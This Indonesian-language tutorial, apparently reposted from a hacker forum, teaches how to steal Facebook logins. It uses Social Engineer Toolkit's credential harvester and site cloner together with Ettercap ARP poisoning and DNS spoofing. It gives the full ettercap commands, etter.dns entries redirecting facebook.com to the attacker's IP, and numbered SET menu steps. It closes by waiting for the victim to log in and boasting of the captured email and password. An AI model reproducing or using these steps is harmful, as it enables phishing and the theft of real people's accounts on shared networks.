Equipments:
1. Ettercap
2. Social Engineer Toolkit / SET

Disini OS yang saya gunakan adalah sebuah Operation System yg di dedikasikan untuk mereka yang gemar melakukan aktifitas penetrati and testing terhadap sebuah system yaitu, Kali Linux yang berbase Debian Wheezy =)). jadi kedua equipment diatas secara default telah terinstall.

saya anggap kalian sudah memiliki kedua peralatan diatas =)

Tahap pertama :

mengatur configurasi file etter.conf :

# nano /etc/etter.conf

kemudian saya mencari bagian iptables dalam kolom Linux dan menghilangkan tanda # pada redir_command_on/off seperti gambar berikut :

save Ctrl+x Y Enter

selanjutnya saya mengedit configurasi pada file etter.dns: 

# nano /usr/share/ettercap/etter.dns

saya mengganti domain default "microsoft" dengan alamat yang ingin sayaspoof ke si korban, lalu
mengganti ip default dengan ip saya:

tahap berikutnya saya menjalankan Sosial Engineer Toolkit atau S.E.T.
pada distro yang saya gunakan sukup dengan mengetikkan se-toolkit pada console dan jika anda pengguna Backtrack maka bisa didapat di directory /pentest/exploit/set/#

Versi yang saya gunakan adalah 5.1:

Selanjutnya pilih : Social-Engineering Attacks (1)

Next : Website Attack Vectors (2)

Next : Credential Harvester Attack Method (3) 

 Next : Site Cloner (2) 

Selanjutnya saya memasukkan IP-Address saya 10.166.240.251 

 Selanjutnya membuat situs cloningan yang mana saat victim mengakses situs tersebut maka kita akan mendapat hak akses penting untuk menerima account dari si victim:
dan disini saya menggunkan url http://www.faceboook.com

silahkan tunggu hingga muncul pemberitahuan yang mana localhost kita siap menjadi cloningan dari situs facebook pada port 80.

 Serangan selanjutnya ialah menggunakan ettercap untuk menarik si korban ke server localhost kita saat korban mengakses situs www.facebook.com.

# ettercap -Tqi vmnet8 -M ARP:REMOTE /172.16.151.2/ /172.16.151.128/ -P dns_spoof

-T = Text only UI
-q = Superquiet
-i = Interface yang saya gunakan
-M = Use MITM Attack
/172.16.151.2/ = Gateway korban
/172.16.151.128/  = Ip-Address korban
-P = Launch Plugin

terlihat pada gambar diatas yang mana serang dns_spoofing telah di luncurkan kekorban. dan sekarang mari kita beralih ke komputer korban.

Pada gambar diatas terlihat korban sudah mengakses url http://www.facebook.com  dan lihat pada ping korban. ip yang dituju korban bukanlah 173.252.110.27 untuk facebook.com melainkan ip saya 10.166.240.251. 

lalu tanpa sadar si korban pun mulai login:

kemudian kita kembali ke console dan lihat log dari hasil serangan dns_spoofing:

dan lihat hasil dari Sosial Engineer Toolkit:

saya telah mendapat email serta password korban

sumber

Cara Hacking Facebook Dengan DNS Spoofing di Backtrack 5 R3

1. buka terminal ctrl + alt + t
2. ketikkan di terminal : cd /pentest/exploits/set/
3. lalu ketikkan lagi : ./set
4. pilih no 1 (Social-Engineering Attacks), lalu enter
5. pilih lagi no 2 (Website Attack Vectors) , lalu enter
6. pilih no 3 (Credential Harvester Attack Method) ,lalu enter
7. pilih no 1 (web templates)
8. lalu masukan ip kita , untuk mengecek ip kita ketikkan di terminal : ifconfig . jika sudah masukkan dan enter
9. pilih no 4 (facebook), lalu enter
10. Press <return> to continue ( kita Enter saja )
11. jangan tutup terminal.

==> nah coba kita cek pada browser dengan menggunakan ip kita . pasti muncul tampilan facebook yg sama persis. jadi jika korban mengakses ip kita dan login nanti email dan password akan muncul di terminal kita.

Namun tidak mungkin jika korban bermain facebook dengan alamat ip kita ,maka disini kita ubah dns facebook tersebut agar terarah ke ip kita. sehingga jika korban mengakses www.facebook.com akan terarah ke ip kita dan data-data akan nyangkol di komputer kita .
==>Cara mengubah dns facebook agar mengarah ke ip kita yaitu dengan ettercap :

1.buka terminal ctrl + alt + t
2.ketikkan : sudo gedit /usr/share/ettercap/etter.dns
3.kemudian cari pada bagian seperti dibawah ini :
################################
# microsoft sucks
# redirect it to www.linux.org
#
http://facebook.com A 192.168.1.3
https://facebook.com A 192.168.1.3
www.facebook.com A 192.168.1.3
*.facebook.com A 192.168.1.3
facebook.com A 192.168.1.3
microsoft.com A 190.182.196.56
*.microsoft.com A 190.182.196.56
www.microsoft.com PTR 190.182.196.56 # Wildcards in PTR are not allowed


##########################################



==> ubah seperti diatas. . untuk alamat ip ubah dengan alamat ip kalian yg tadi . itu diatas alamat ip saya 192.168.1.3

4.jika sudah simpan (ctrl+s)
5.jalankan dengan perintah : ettercap -Tqi (interface) -P dns_spoof -M ARP // // (tekan enter)catatan interface misal : eth0,wlan0
6. Tunggu deh korban login

Sekian Tutor dari saya semoga bermanfaat

sumber : http://forum.indonesianhacker.or.id